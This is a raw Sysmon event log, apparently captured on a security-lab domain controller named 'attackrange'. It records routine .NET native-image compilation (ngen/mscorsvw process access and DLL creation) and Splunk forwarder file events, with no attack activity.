21:04:27.478{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DB-60D3-CD03-00000000CF01}6544C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020810Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:27.463{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1DB-60D3-CD03-00000000CF01}6544C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020809Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:27.463{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DB-60D3-CD03-00000000CF01}6544C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020808Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:27.290{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DB-60D3-CC03-00000000CF01}2680C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020807Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:27.274{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1DB-60D3-CC03-00000000CF01}2680C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020806Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:27.274{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DB-60D3-CC03-00000000CF01}2680C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020805Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:27.243{4DB9351A-A1DB-60D3-CB03-00000000CF01}2228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\8b4-0\Microsoft.UpdateServices.SMPlugin.dll2021-06-23 21:04:27.228 23542300x800000000000000020804Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:27.118{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B50401B0B6C7550890626C7FB0CE6FC4,SHA256=1E4B92DD733C3F8684A035E458D0C275627FCAEFEAB626C5249FD169ED29E1F2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020803Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:27.071{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DB-60D3-CB03-00000000CF01}2228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020802Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:27.024{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1DB-60D3-CB03-00000000CF01}2228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020801Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:27.024{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DB-60D3-CB03-00000000CF01}2228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020821Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:28.916{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=050D24C04FE7B4BA77804ED3CE8287CE,SHA256=713B98D71573946980D2D69D226FFDB6E3B3C522A25BDB3F01D09208EB2E671F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020820Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:28.165{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DC-60D3-CF03-00000000CF01}4192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020819Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:28.150{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1DC-60D3-CF03-00000000CF01}4192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020818Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:28.150{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DC-60D3-CF03-00000000CF01}4192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020817Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:28.134{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAA2B8405185CD218A9A5D359CED0744,SHA256=A6CAF74A38C33DD1CFCF69BEFE1B52006D6AF621808305D2C420612687EB8C0C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000020839Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:29.946{4DB9351A-A1DD-60D3-D303-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\fec-0\Microsoft.VisualC.dll2021-06-23 21:04:29.946 10341000x800000000000000020838Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:29.900{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DD-60D3-D303-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020837Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:29.853{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1DD-60D3-D303-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020836Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:29.853{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DD-60D3-D303-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020835Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:29.837{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DD-60D3-D203-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020834Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:29.821{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1DD-60D3-D203-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020833Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:29.821{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DD-60D3-D203-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020832Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:29.696{4DB9351A-A1DD-60D3-D103-00000000CF01}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c34-0\Microsoft.VisualBasic.Compatibility.Data.dll2021-06-23 21:04:29.696 23542300x800000000000000020831Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:29.415{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=105930C7BBE437BABEF9A72B4D7E1957,SHA256=71700865071BECB932832A63343FE3E27074EBF3450401FE13CBAE1479DFDB62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020830Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:29.415{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C1EE506BB9DA5CC7A3C64B2B5A08634F,SHA256=0EFEB4F6F0BFF9C29F679F5DCB696EA59B53D52560EE6EB28CEA1BFDFE114C1D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020829Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:29.369{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DD-60D3-D103-00000000CF01}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020828Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:29.337{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1DD-60D3-D103-00000000CF01}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020827Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:29.337{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DD-60D3-D103-00000000CF01}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|